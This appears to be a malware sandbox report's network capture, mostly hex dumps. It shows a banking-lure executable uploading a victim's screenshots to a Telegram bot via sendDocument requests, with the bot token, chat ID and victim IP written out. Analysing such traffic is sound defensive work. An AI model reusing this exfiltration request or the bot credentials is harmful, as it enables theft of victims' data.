ce 1c e9 00 00 00 04 67 41 4d 41 00 00 b1 8f 0b fc 61 05 00 00 00 09 70
                                                                        Data Ascii: --===============8dd1c3bef997f68Content-Disposition: form-data; name="document"; filename="C:\Users\user\Documents\NOVA\Captured.png"Content-Type: application/x-ms-dos-executablePNGIHDRCsRGBgAMAap
                                                                        2024-12-12 20:39:18 UTC16355OUTData Raw: 9c d9 8b 21 21 41 71 3a fe 94 a7 3b b1 d4 35 c2 4f d7 7a d5 e1 07 08 3e 7f ee 9f 4b 40 c1 0b 3f 10 7d e5 ba ef 4e 74 0e 12 a7 b6 17 43 f4 f1 22 10 ef fa 63 04 3d 1b 50 71 ea 18 79 56 a0 64 a1 3a 06 81 bc 60 4d 5e cf ff 53 07 e0 b2 1d 63 5a 21 d8 08 3a 24 5b 91 71 39 ae 2b bf 08 3e 49 3e c5 18 89 21 08 d9 2f 01 a8 73 bd 8b 8f b9 3a f4 80 f9 9a 5d 79 e1 48 3e ab 91 80 ca a9 de f7 03 75 aa 57 8e 51 2f 11 e1 0c 3f 8b 6b bd 83 84 9d 04 1d b2 0f e9 86 8c 23 c6 1e 62 ec 93 c0 23 2e 49 a7 7d aa 57 4e 73 c7 f7 e8 b3 15 63 ce 19 7c 8e be 27 71 7d 7e f9 ec 06 09 3b 46 c5 56 72 4e 8e 69 94 d0 63 ad 7a d5 0a e2 7e 06 73 5d f7 55 4c 73 ce 42 d0 81 e4 9b 84 1e 6b c4 9c 62 92 74 cc 55 2b 01 c8 ba 3e 87 7a 40 dc b1 f6 bd a2 fe 5c c5 b5 97 3c fb f9 1c d5 11 67 4e ac bc 2d
                                                                        Data Ascii: !!Aq:;5Oz>K@?}NtC"c=PqyVd:`M^ScZ!:$[q9+>I>!/s:]yH>uWQ/?k#b#.I}WNsc|'q}~;FVrNicz~s]ULsBkbtU+>z@\<gN-
                                                                        2024-12-12 20:39:18 UTC16355OUTData Raw: fd 7e 6d 98 d1 eb 25 ff b4 97 39 f2 4f 02 50 fb da bd 88 b3 06 49 3b 40 d0 01 71 09 40 e2 12 80 d4 4a e2 a9 5e 7b 85 62 d4 a8 2e 12 7e aa f7 3a e5 10 7f c0 b5 df ee 4b ce 2c 73 75 04 32 47 ee 21 00 19 79 23 b0 9e f1 a7 0e 40 c9 c0 22 fb 38 93 cf e1 7b 37 39 84 9f 40 e8 21 f6 04 b2 4f 90 a3 86 b9 72 ac 17 2c 00 bd f3 cf e3 9f fc e1 ba 74 fe 05 17 a6 cb ae b8 2a 14 7c a3 18 26 00 1d 97 81 ff c7 37 f2 7f 60 1d 3f f3 d6 df 41 6f fe 75 5c e8 0d 43 42 2c 8a 0d c3 eb 23 8e 58 7b 5e 23 00 eb ee bf c3 33 9f 4a bf bf ef ab a1 8c aa a9 05 e0 0d 37 dc b0 5e 04 60 74 ed d7 89 64 de 7c 58 12 80 fd 82 8e f9 d2 15 e0 f1 78 be 09 c0 0e 02 ae 8a 8d 4b 24 ff 9c 50 fa 39 81 f4 73 5c f2 0d 63 96 98 1b 10 9f 34 eb 5b 00 ae 6f 09 18 c9 3f d8 18 05 20 44 92 6f 18 91 f4 73 6a a1
                                                                        Data Ascii: ~m%9OPI;@q@J^{b.~:K,su2G!y#@"8{79@!Or,t*|&7`?Aou\CB,#X{^#3J7^`td|XxK$P9s\c4[o? Dosj
                                                                        2024-12-12 20:39:18 UTC16355OUTData Raw: bf 9f 23 fc ae 5e 30 f3 bb 1a d5 01 c8 fe 9c e3 f3 ba 47 e7 df 8f 11 89 bd 96 21 f2 0f 5c e2 2d 84 5a cc 0d 8a 4f 9a 48 fa 39 91 f4 73 22 89 b7 10 22 89 b7 10 22 e9 e7 44 52 6f 1c 22 a9 37 0e 91 e4 1b c6 2c 81 b7 50 22 a9 37 0e 81 f0 1b 44 24 f0 16 4a 24 fd 9c 48 e4 2d 84 25 01 38 9c e7 9e 00 ec a7 fb e1 7b c6 62 2e d2 cf 59 88 00 84 d9 02 70 81 04 52 6f 1c 10 80 a2 74 e2 8d 8b c9 bc 88 41 42 51 f9 5a 00 76 de 71 5b 21 92 7e 4e 24 00 bb 6f bb 79 16 91 d4 1b 87 48 fa 39 91 e4 73 ea 2b c4 93 10 80 11 91 dc ab 3b ff 14 73 90 7c f5 15 61 70 01 38 97 2e c0 28 0f 2e fc bc 56 73 ae fc 8a f6 3a 6f 43 11 7c 55 cd 2c 46 08 40 c9 bf ce 2b af ee 93 80 9a 23 f9 24 01 25 ff 40 02 50 52 70 10 48 3c c9 3b e4 9f 5f 27 ee 13 7a 4d 5e 73 49 c0 41 c2 10 c1 87 f4 43 00 22 fa
                                                                        Data Ascii: #^0G!\-ZOH9s"""DRo"7,P"7D$J$H-%8{b.YpRotABQZvq[!~N$oyH9s+;s|ap8.(.Vs:oC|U,F@+#$%@PRpH<;_'zM^sIAC"
                                                                        2024-12-12 20:39:18 UTC16355OUTData Raw: 80 c4 26 bf f4 57 b5 65 bd f9 c8 40 05 a0 72 4d b9 87 58 03 c5 9d 22 0e e9 d6 8a 3e f3 cc 65 1f f3 21 0a 3b 63 ee a9 10 a4 65 6c 8e c2 71 94 7c 43 9b ad 57 e4 29 fb 90 78 de fa 0b c4 89 29 f7 cc 01 e6 c8 e1 36 61 41 08 ba 86 b1 c2 ec f0 49 9f 1a bf 05 48 cb 58 19 47 5f 01 07 8e 91 71 e6 44 01 27 e4 32 4f 4b 6e cc 37 ee 7e 10 c7 bc 83 cf a0 b5 1f f3 d9 c3 18 d8 27 ee dc 2c 89 47 1c 11 28 f1 66 5f 69 c7 11 f7 da 7b 01 b8 1d 8e 53 01 98 cd 67 52 6f 15 ea de 2b 54 ec a5 ef b0 02 d9 9e 3b 63 fb c7 87 61 55 e1 d7 a2 00 54 02 ca 58 0d f8 c1 07 bb 03 1f ea 46 18 af 5d 71 7f 59 db cb c0 2d df 0e 5c b1 12 50 e9 87 08 94 28 01 ab 84 2b ed 94 f4 3b ef f6 5d 15 80 51 f8 b5 44 41 b7 d7 64 82 6f 11 ad 00 6c c9 24 dd f1 c0 5e 09 c0 79 ec 54 00 2e 43 26 f9 e6 91 49 bf 88
                                                                        Data Ascii: &We@rMX">e!;celq|CW)x)6aAIHXG_qD'2OKn7~',G(f_i{SgRo+T;caUTXF]qY-\P(+;]QDAdol$^yT.C&I
                                                                        2024-12-12 20:39:18 UTC16355OUTData Raw: a2 85 12 70 ba ca 6e 76 ac 07 41 37 dd 66 3f 67 a4 cf dd 4d e2 f3 a7 e1 bd 23 1c fd b5 f5 e8 70 7b 64 f8 e0 07 ef ef 36 0a 07 ae 3c 5a fe ac ef 2d 7f a6 e5 67 47 80 22 1b eb f7 03 cb ff 56 40 f3 ed 40 51 04 b6 28 eb 66 71 e0 dc 9e 4c 9a c1 94 e4 2b 64 12 11 da 3c f0 fb 80 2d b5 a2 31 b4 c7 82 c9 d9 b7 cc 64 91 dc 5b 06 8f 08 6f 97 4c fa ad 42 26 05 57 21 93 7e 91 ad 42 af a5 bc c7 2e b1 dd 23 c2 73 79 d7 0f e6 b2 17 c2 70 f2 ce ad a2 6f b7 98 bc fd e6 29 32 e9 17 59 7f 7b 59 d7 c4 32 11 38 93 3f f8 5e b7 f6 fb b3 59 5f 91 b5 b7 7c 77 9a 37 4f 0b c1 55 d9 f8 bd ef cf 65 fd 4d e5 77 50 d8 58 82 f5 37 de b4 85 b5 df 2d ef 5d da 2c b7 9f eb 45 e0 76 51 00 2e 0b f2 cf b6 25 3b 3a 6c 05 e0 76 99 27 f1 76 2a 09 01 01 b8 88 f5 5f fb d6 16 d6 7e f5 ef 2a 99 14 8c
                                                                        Data Ascii: pnvA7f?gM#p{d6<Z-gG"V@@Q(fqL+d<-1d[oLB&W!~B.#sypo)2Y{Y28?^Y_|w7OUeMwPX7-],EvQ.%;:lv'v*_~*
                                                                        2024-12-12 20:39:18 UTC16355OUTData Raw: 19 08 e7 1c 3b 01 b8 17 12 30 93 7e 91 28 f0 22 13 05 5d 32 37 0b d7 8c 2c 21 00 b9 bd 77 1e 99 f4 8b 64 d2 2f 92 49 b9 63 49 2a ff 00 91 d7 88 bd 55 79 28 04 e0 56 09 98 0b bb dd c2 6f 01 66 32 0f 1e e9 02 10 32 f1 27 fb 02 70 9a 4c f6 65 1c 2b 01 98 a1 fc 5b 46 00 4a 2b fe a4 95 7b 2d 59 ce 6e 0b c0 58 f1 17 05 60 5c db ca 3f 51 ee cd 12 80 31 16 05 a0 22 af 15 80 ad 04 64 ac dc ab fd 61 9d 02 90 aa bf 65 05 20 2d 47 7f 0f 51 6d 18 8e 01 cf 43 d1 27 b1 62 10 94 7f 0a 40 51 00 72 fc 97 16 e9 47 3c 5e 00 52 fb 67 6d 1e fb 05 a5 9f 55 7e f4 39 f6 8b f0 33 c7 31 df 0b 6c e5 1f 97 82 c0 a1 b3 7a 14 7f 51 00 52 01 e8 37 01 91 78 10 bf 01 a8 c8 ab 15 7c cd 78 14 7b 83 1c 8c 95 81 51 00 9a ef 65 1f b3 04 20 15 80 0a 3d 05 60 15 7b c3 85 20 56 fe 21 ff 8c 79 1c
                                                                        Data Ascii: ;0~("]27,!wd/IcI*Uy(Vof22'pLe+[FJ+{-YnX`\?Q1"dae -GQmC'b@QrG<^RgmU~931lzQR7x|x{Qe =`{ V!y
                                                                        2024-12-12 20:39:18 UTC16355OUTData Raw: 0f 21 e8 91 04 54 a5 a0 aa 05 8b 00 9c da c2 4d c1 3d 90 7d 48 bf ba 2a 70 f6 72 e2 cd cd c2 d3 5b 6d 9d 17 82 1c 13 d6 11 e1 22 05 bb 17 ff 5d 9a be d8 e6 24 01 cf ef 49 bf ee f9 36 5f 08 a5 dd 24 09 a4 9f 27 94 7e 9e 40 ba f5 13 49 bd 71 88 f6 1c 9d 48 ea 8d 83 17 7d 83 58 15 80 f6 b9 cb 24 00 97 4a 24 ff 20 92 7d 11 cf 25 01 18 0a bc a5 12 c8 bc 71 88 44 9f a7 96 7e 35 12 80 a3 8a c0 71 05 20 b7 00 d7 37 01 7b 34 e7 65 9f f0 f1 50 fe 19 e3 be f7 6f 98 00 8c 24 a0 8e fb d2 f7 39 b5 00 54 25 60 2d 00 23 b1 17 c5 22 72 4e 91 7b 3a 02 ec 05 9f 17 81 0b 09 c0 41 82 4f 63 c5 16 42 e2 af a5 12 7f 42 95 80 aa 0c 44 06 d2 22 04 bb c7 dd 91 85 9d 97 7a 12 80 12 7a f4 41 37 06 4b f2 49 fc 51 e9 07 7e 4e 31 e6 b5 9f 62 48 3f aa 01 e7 55 04 16 91 27 e1 c7 7b 01 55
                                                                        Data Ascii: !TM=}H*pr[m"]$I6_$'~@IqH}X$J$ }%qD~5q 7{4ePo$9T%`-#"rN{:AOcBBD"zzA7KIQ~N1bH?U'{U
                                                                        2024-12-12 20:39:18 UTC16355OUTData Raw: be ba b8 b9 44 a4 5b 6e 0c 6e 2b 00 87 08 40 dd 16 bc 54 09 f8 7c 14 80 d3 67 d9 f7 53 a8 e7 56 05 60 3f d1 7b 05 47 45 02 70 e6 fd 0f f5 89 bc c5 52 0b c0 90 11 05 a0 f2 23 69 37 49 bc f8 8b 64 5f 14 f3 2c 55 00 6a 0d 92 af 3d ee 5b c6 b3 36 b7 ab 0b c0 d9 80 99 b7 df db 82 e4 1b 86 84 dd 62 90 f0 93 e0 ab e7 10 7c 9a d3 b8 06 c9 a7 5b 80 bd f8 13 4b 15 80 b5 f0 93 10 54 5f 52 6f 10 e3 08 c0 48 02 22 eb 24 00 55 f5 e7 ab 01 bd 00 f4 79 92 7e 82 18 48 fc b1 2e cb c5 2a af 16 80 d0 1e 23 96 dc ab 84 5f 2d ff f2 6d c0 45 fc 65 d9 47 c5 df 31 77 f4 e4 9f c1 b1 5e 04 1c ef ff cb e3 72 63 30 63 ad cb 6b 9c ec 93 b4 f3 30 af 63 c0 cc 33 96 f8 ab e3 9a 93 00 64 ac 8a 3e 5a 64 20 02 b0 ad ee b3 b8 8e ff 22 04 f5 8e 40 e6 c9 cf 14 f9 37 88 75 b6 27 ad 64 9e 97 7d
                                                                        Data Ascii: D[nn+@T|gSV`?{GEpR#i7Id_,Uj=[6b|[KT_RoH"$Uy~H.*#_-mEeG1w^rc0ck0c3d>Zd "@7u'd}
                                                                        2024-12-12 20:39:18 UTC16355OUTData Raw: d7 cb 3f e2 ad 10 ac 85 9f 13 82 99 22 00 6b 54 e5 87 d4 53 95 1f 78 01 48 d5 9f 8e 09 93 c3 3a bd 03 50 95 7f ad f8 33 74 1c 38 c7 8b dc 93 e8 93 f8 f3 68 ce 8b 3e f0 63 2f 02 25 00 95 d3 3d a6 79 f7 9f 2a ff 74 fc d7 e3 8f fb 4a 04 22 fa 5a c1 57 84 1f 31 e5 fa f9 d9 63 ee 68 2e 12 39 fa f6 34 7d 54 53 11 28 01 48 1f f9 87 18 94 24 d4 25 21 12 82 92 7f 12 72 b5 04 64 4e 02 4f 71 a4 9f 04 20 d0 47 ec 91 43 3e d5 80 ac 25 c6 bb 02 99 f7 7b d2 4a 08 4a d8 09 c6 c8 3b 09 41 2f 00 89 49 fe e9 1d 80 f4 6b 01 48 9e e2 08 3c 09 3b 89 3f 5a f0 97 86 30 4f ae cf a9 e5 a0 df 4b 73 54 f9 a9 d2 4f 52 cf 0b 41 5f ed 57 4b 40 40 e0 49 da 49 e0 21 ec 10 78 92 7f 12 7a b9 92 0f 79 67 71 bf 8e 7c aa fe 34 cf 9c 68 df 21 68 eb a1 96 79 12 80 c4 18 23 07 6b 01 a8 b1 d6 28
                                                                        Data Ascii: ?"kTSxH:P3t8h>c/%=y*tJ"ZW1ch.94}TS(H$%!rdNOq GC>%{JJ;A/IkH<;?Z0OKsTORA_WK@@II!xzygq|4h!hy#k(
                                                                        2024-12-12 20:39:20 UTC389INHTTP/1.1 200 OK
                                                                        Server: nginx/1.18.0
                                                                        Date: Thu, 12 Dec 2024 20:39:19 GMT
                                                                        Content-Type: application/json
                                                                        Content-Length: 1817
                                                                        Connection: close
                                                                        Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                        Access-Control-Allow-Origin: *
                                                                        Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                        Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        9192.168.2.549802149.154.167.220443768C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        2024-12-12 20:39:23 UTC2114OUTPOST /bot7553624894:AAGTJv4BkRj8lx4-LF3RVSC0dG1iGleV1FU/sendDocument?chat_id=8064644982&caption=user%20/%20SCREENSHOT%20/%208.46.123.189%0D%0A%0D%0A***********************************************************%0D%0A*%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20*%0D%0A*%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20*%0D%0A*%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20_%20%20%20%20___%20%20%20___%20%20___%20___%20___%20%20%20%20*%0D%0A*%20%20%20%20%20%20Best%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7C%20%7C%20%20/%20_%20%5C%20/%20__%7C/%20__%7C%20__%7C%20_%20%5C%20%20%20*%0D%0A*%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7C%20%7C_%7C%20(_)%20%7C%20(_%20%7C%20(_%20%7C%20_%7C%7C%20%20%20/%20%20%20*%0 [TRUNCATED]
                                                                        Content-Type: multipart/form-data; boundary================8dd1c70b312a3b0
                                                                        Host: api.telegram.org
                                                                        Content-Length: 667806
                                                                        Connection: Keep-Alive
                                                                        2024-12-12 20:39:23 UTC16355OUTData Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 31 63 37 30 62 33 31 32 61 33 62 30 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 43 3a 5c 55 73 65 72 73 5c 61 6c 66 6f 6e 73 5c 44 6f 63 75 6d 65 6e 74 73 5c 4e 4f 56 41 5c 43 61 70 74 75 72 65 64 2e 70 6e 67 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 05 00 00 00 04 00 08 06 00 00 00 be 93 f4 43 00 00 00 01 73 52 47 42 00 ae ce 1c e9 00 00 00 04 67 41 4d 41 00 00 b1 8f 0b fc 61 05 00 00 00 09 70
                                                                        Data Ascii: --===============8dd1c70b312a3b0Content-Disposition: form-data; name="document"; filename="C:\Users\user\Documents\NOVA\Captured.png"Content-Type: application/x-ms-dos-executablePNGIHDRCsRGBgAMAap
                                                                        2024-12-12 20:39:23 UTC16355OUTData Raw: 5d 80 e4 99 8b f8 2b 47 85 7f ef ac 22 f9 10 79 bc cf cf a3 bf 40 9c a3 be 1b f9 4c 39 6e 55 a0 02 90 79 da 81 00 dc 7c 09 b8 28 b3 8e 3a f3 ae b6 e0 5b 8e 2d 20 00 cb 0d c0 e1 b3 8d a4 25 f5 22 ad 35 53 e4 b8 ab ae a8 04 a0 d5 7f c8 bf 93 53 ba f3 c4 f4 cf f7 5d d2 14 52 08 c0 db be fb ed 74 ff bd 77 0d c9 3f 18 12 80 99 1f 9f f2 9e 74 e1 1f ff d5 60 7e a5 02 70 fe a4 87 96 c4 5a d2 6e 9a b4 e4 dd 34 68 7d 87 93 b0 25 04 60 53 ca 6d 4d 1a d2 6e 9a b4 a4 df 34 69 49 bf 69 d2 94 80 81 f9 b7 8d 67 e1 ed 3f 28 d0 5f 22 ef 1a b1 49 99 7f 4b de 7b 0c 73 c7 e7 67 4c 91 de 9b ef 99 88 f9 15 b2 90 f7 6e c5 e6 8e cb ff 3b 35 86 f9 63 57 ce dc 9b ee 5e 42 4b f2 8d a3 25 f7 46 d1 7b c3 9d 83 fe 63 4d 00 6e 2e 8a 43 d8 9a 15 80 2d c6 09 c0 9a a9 1c 03 fe eb 5b fb 4c
                                                                        Data Ascii: ]+G"y@L9nUy|(:[- %"5SS]Rtw?t`~pZn4h}%`SmMn4iIig?(_"IK{sgLn;5cW^BK%F{cMn.C-[L
                                                                        2024-12-12 20:39:23 UTC16355OUTData Raw: 5c 66 03 42 ae 7b 27 20 30 47 d5 9f b2 cf 63 be f4 ad f2 db c8 cf 96 63 51 0c 52 0d d8 7b ea 99 a5 b5 9a 0f e8 c7 0b 41 88 d1 8f 97 7e 78 2b f0 fc 53 cf 4e 73 bf 9f f7 99 fb e0 c3 69 35 20 09 47 81 04 b4 fd 3f 4e fd 5e 3a fc 23 d7 a4 b7 9d f6 e9 f4 91 8f 7c 24 7d f8 c3 1f 4e 9f fa f4 3f a4 73 cf 3b 3f 5d 79 f5 52 19 38 4a 00 9e fa b1 4f a6 f7 9c 74 4a 3a ee f8 b7 a6 57 bf fa d5 45 fc fd f9 df be 25 fd fe 5b cf 49 bd 53 1e 4a bd 0f fc 78 98 f7 3f dc c6 f9 4e 64 d5 52 ae c0 31 d7 c6 7c 44 91 b8 b9 b8 cf af 7c e8 b6 74 cd 0d ef 5d ac fe fb f6 31 99 37 a4 9f 7f f7 5d 43 62 ef 96 1f fc 28 fd c3 c5 57 a6 53 3f 7f 51 ba e1 86 1b d2 c3 0f ff a8 c8 a9 5a 00 9e f9 c1 4f a4 af bc ee 35 e9 cb 2f f8 8b 74 e5 3e 07 a7 cf be f5 d4 74 e7 83 8b f3 e7 7e fd ee d4 7b cf 3d
                                                                        Data Ascii: \fB{' 0GccQR{A~x+SNsi5 G?N^:#|$}N?s;?]yR8JOtJ:WE%[ISJx?NdR1|D|t]17]Cb(WS?QZO5/t>t~{=
                                                                        2024-12-12 20:39:23 UTC16355OUTData Raw: f4 38 fa ab d8 23 a6 d0 33 c7 31 b2 2f 8e a3 38 04 e6 11 7e 4a 3f da ba 1a 50 a9 a7 e8 53 e6 11 73 2e ce d3 f6 2b fb fa f3 51 00 9a 3b 0c 7b f4 19 48 bf 00 52 4e 71 87 94 ab a5 1d 20 fc 90 75 ca 3b d6 80 73 ae 33 9f bd cc ab c7 52 a4 e2 4e e7 0f c9 34 c5 1b 58 95 67 dc 31 f9 4a 3b 2e f0 40 d8 b9 86 be e3 b8 36 e2 b3 a2 c8 ab e7 e2 78 dc 1a 9e 11 05 20 7d 85 1e 63 c5 5d 6b 5e 49 67 1f cc a9 2f 14 a1 15 f7 32 4e 95 20 6b 15 80 f1 79 10 8f f8 d2 af c7 1e 11 1e 25 00 39 02 1c 05 1f 20 f1 18 83 47 84 1d 2b f9 7c 07 a0 d5 7e f4 e3 5a 5a d6 2a ee 6a d9 07 56 fc d5 42 30 56 02 72 21 88 31 a5 a0 63 da d1 02 f0 b5 57 f5 a5 1d 55 6c 1c 8d ed 2e ef 28 b7 fc f2 4e 39 8f 96 22 bb 88 e7 dc 52 3d c7 7c 5c 43 9c bd a8 92 db f1 8f 4b 75 d5 19 cf ef 1f 0f 66 5c 44 d9 5e 2f
                                                                        Data Ascii: 8#31/8~J?PSs.+Q;{HRNq u;s3RN4Xg1J;.@6x }c]k^Ig/2N ky%9 G+|~ZZ*jVB0Vr!1cWUl.(N9"R=|\CKuf\D^/
                                                                        2024-12-12 20:39:23 UTC16355OUTData Raw: c6 c3 2c 00 d9 a3 95 7f 30 ff 67 1f be 7b 21 de 21 38 de 1b 18 a8 71 e7 07 29 18 2b 00 ad 0e dc ff 7e da fb 87 fb 03 11 82 3c 26 52 f6 68 7e 3f 1b c4 60 69 33 a9 b7 08 99 f8 93 4c d4 1d 2a 32 c1 b7 19 99 d4 5b 84 4c ea 2d 42 26 f7 b6 42 26 e8 0e 35 4b 01 58 62 89 94 3b 9c 2c 05 60 59 bf 8b 64 32 6f 3b 64 f2 0f 32 a9 b7 08 99 ec cb c8 a4 de 22 64 f2 0f 32 c9 37 8f 95 44 f6 65 2c 05 e0 92 25 5b bf 03 90 be 55 7f a3 fc 03 c6 03 ad fc 03 04 a0 d5 7e cc 29 04 cd 47 ea 45 a2 08 54 fa 79 df 1f 95 80 4a 41 8e 02 d7 f9 41 c6 45 81 d7 8a ba d8 37 07 69 37 79 fe 0d 63 3c ce 01 f1 28 fd 88 29 0b 9d ab e2 cf b5 4d e5 9f 18 8b d2 0f 31 67 3f 0a 3f e5 20 0f 83 30 26 cf 58 5c 6b 9c 9c 58 f9 c7 9d 80 8c 9d 23 a6 e4 43 fe 71 c7 1f 7d e5 1f a2 4f 01 d8 4a c0 56 fe f9 da 2f
                                                                        Data Ascii: ,0g{!!8q)+~<&Rh~?`i3L*2[L-B&B&5KXb;,`Yd2o;d2"d27De,%[U~)GETyJAAE7i7yc<()M1g?? 0&X\kX#Cq}OJV/
                                                                        2024-12-12 20:39:23 UTC16355OUTData Raw: ee 13 c7 ad c8 6b 51 ae cd 42 29 47 6e 8c 53 e5 c7 a3 1f b4 8a b9 56 e2 91 c7 ba 76 0f f2 21 0a 48 e6 58 43 1b c9 e6 6a 9f 3b fe 7e fa c3 53 47 7f c7 fb ff 4a 9f e3 bf 1c 03 3e 22 04 a0 77 00 72 ef df e7 7f e9 e7 6b 9f bf b2 dc 9d f0 c8 11 80 97 75 dd 77 2e 29 ed 15 5d 77 eb 9f 8f 2f 02 f7 f7 00 f6 55 80 77 d7 63 c0 fd 63 20 54 01 de 47 15 e0 28 00 7f bd 7b e0 ab eb f7 00 66 9f 7b b8 38 34 02 f0 be 19 e2 ef be ee 43 7f 79 47 2a fd 66 41 ee 9f 7f e9 f6 8d f2 af 11 80 ef 38 ed b4 f4 3b c9 28 c4 92 d8 a3 8a 0b ee 9c 22 13 80 d0 56 0c 8e 02 90 63 c2 de 19 08 88 3d 04 df c5 f7 75 ab 97 dc df ad 5d fa 40 15 7f a0 0c a4 4f 9c f9 2a 04 15 81 80 04 0c 70 87 60 24 93 7e 91 4c fc 45 5a a1 f7 58 13 80 d9 bd 7f 91 4c ea 2d 42 26 f5 16 21 93 7a 8b 90 89 bc ed b2 5d 01
                                                                        Data Ascii: kQB)GnSVv!HXCj;~SGJ>"wrkuw.)]w/Uwcc TG({f{84CyG*fA8;("Vc=u]@O*p`$~LEZXL-B&!z]
                                                                        2024-12-12 20:39:23 UTC16355OUTData Raw: 21 77 38 79 e3 7f f3 4f bb c9 6f 5c 59 fe d0 b8 2e 00 61 f5 fd e5 0f cf 73 88 b9 19 93 4b ef dd 11 79 f5 df 69 5d f7 f5 42 89 6d 26 00 ef 5a 44 00 9e 5b fe c0 73 7e f9 43 e0 85 e5 0f d5 83 08 cc a5 de 22 dc b5 30 99 fc 83 2c 37 f2 ee f7 bc 67 cb 02 70 9a bb cb 3f 8b b9 dc db 0a 55 00 be ee f5 8f 08 01 b8 c8 5a c8 24 de 4e 48 25 dd a1 e4 7c c4 5b 90 62 75 bc ce ba 8c cb 64 df 3c e2 da f2 7b 6d 05 de 20 00 eb e7 5c 30 7c 9e 6d 4b c9 97 0d fb 9c fb e3 6e f5 9c f2 df a1 81 95 73 a7 99 9c 37 83 f3 cb 7f 3f a0 f6 87 f1 05 f7 95 bf 07 f7 77 ab 17 3d d0 ad 5d fc 60 b7 e7 92 87 36 b0 b7 b0 56 e6 57 4b de 9e 0b ee ed 78 48 64 cf b9 77 54 d6 ce b9 7d ea d8 ef b2 02 30 61 29 00 a7 09 b2 2f b2 f6 8e 1f 54 b2 b9 c8 4a c3 e4 6d e5 7b 2d 40 26 f5 16 61 f2 b6 6f f7 24 d2
                                                                        Data Ascii: !w8yOo\Y.asKyi]Bm&ZD[s~C"0,7gp?UZ$NH%|[bud<{m \0|mKns7?w=]`6VWKxHdwT}0a)/TJm{-@&ao$
                                                                        2024-12-12 20:39:23 UTC16355OUTData Raw: 5c 02 70 d1 5e f6 9d 5b 3f 0b 42 03 61 87 cc e3 b8 af 44 20 22 4f c7 7f bd 00 f4 47 82 89 f9 e3 bf c4 a1 da f3 b2 8c 97 80 80 e0 d3 7b fe d4 aa 1a 90 f7 06 42 3e 22 8c 6c db f9 f2 2c f5 c0 0b 3d c4 1f d5 7e 88 3f 8e 01 2b 97 31 d5 7f be ea 4f 6b 40 02 10 10 7d 91 c4 03 f5 39 02 4c 5f 95 7e ca 43 0c d2 b2 1e 94 ef f7 93 98 2b 2b f7 4a 01 e8 e5 a0 24 1e ad 62 5a a7 ea 3e c6 7e bd 47 f9 79 4d 2d ef 24 ec 4a 24 f5 24 ef 24 ff 7c 8c 3c 2f fc 00 c9 c7 3b ff 94 5f ee a7 35 be e2 ae 14 7a f4 55 c5 47 1f e9 47 45 20 2d 31 2a 02 7d 3e 10 f7 6b fc 5e ec 0f ac 2f 2b 08 b5 4e 6b 01 e9 88 6c 43 ba 95 02 50 02 ce 0b 3c c9 3a 49 3a c6 c0 18 c8 51 c5 9f 72 85 df c7 a3 cf d6 bc 72 b5 cf f0 04 20 c7 6d 8f fe 52 7e c7 dd da d3 b7 4e 95 60 aa 85 0a d5 71 c8 a3 9d 3f 5f 1d 4f
                                                                        Data Ascii: \p^[?BaD "OG{B>"l,=~?+1Ok@}9L_~C++J$bZ>~GyM-$J$$$|</;_5zUGGE -1*}>k^/+NklCP<:I:Qrr mR~N`q?_O
                                                                        2024-12-12 20:39:23 UTC16355OUTData Raw: 96 7e 0b 2c c7 4b 40 24 9f 47 02 50 42 50 94 f2 4f 62 90 5b 7f 9b 9b 7f 6b 18 2f 3a fc 96 2c fa 10 7f 80 10 94 14 d4 3b 00 45 29 02 91 7c 92 7f 7e 5e 73 9d 83 ae 6b e2 1c ed 45 d8 49 e6 49 e8 d1 ea dd 7f 1c fb 45 ec 2d b6 e7 e7 38 b0 7f 0f a0 84 1f 48 14 12 f3 b7 ff 0a 89 3f f0 63 2f 02 25 01 11 7c be c2 8f 76 f1 81 37 e4 d6 1f ff e5 68 b0 90 04 44 14 22 f7 24 f5 54 d5 e7 85 60 eb 6d 97 e6 1b 82 91 7d dc 0a 4c 9c be 64 60 ae d6 ab a5 1f 12 4f ef f2 53 8c e3 bc b4 d0 7a 9b fd 7f fd ae ec 71 4d f3 de 40 60 0c 92 7f e4 49 fc e9 32 10 09 40 2e 02 69 ed 62 f3 54 c2 ed 6e 9f 51 0b 3d c9 bf c5 7b 5d 9f c6 f6 bc 2e cb 3f aa ff 88 31 0f ac 91 08 04 72 c6 f6 b2 cf b7 cf 90 ec 53 f5 1f 42 50 d5 7f f4 bd 20 f4 32 10 b1 a7 a3 be 08 3e 7f d4 57 52 10 01 88 ec 53 a5 60
                                                                        Data Ascii: ~,K@$GPBPOb[k/:,;E)|~^skEIIE-8H?c/%|v7hD"$T`m}Ld`OSzqM@`I2@.ibTnQ={].?1rSBP 2>WRS`
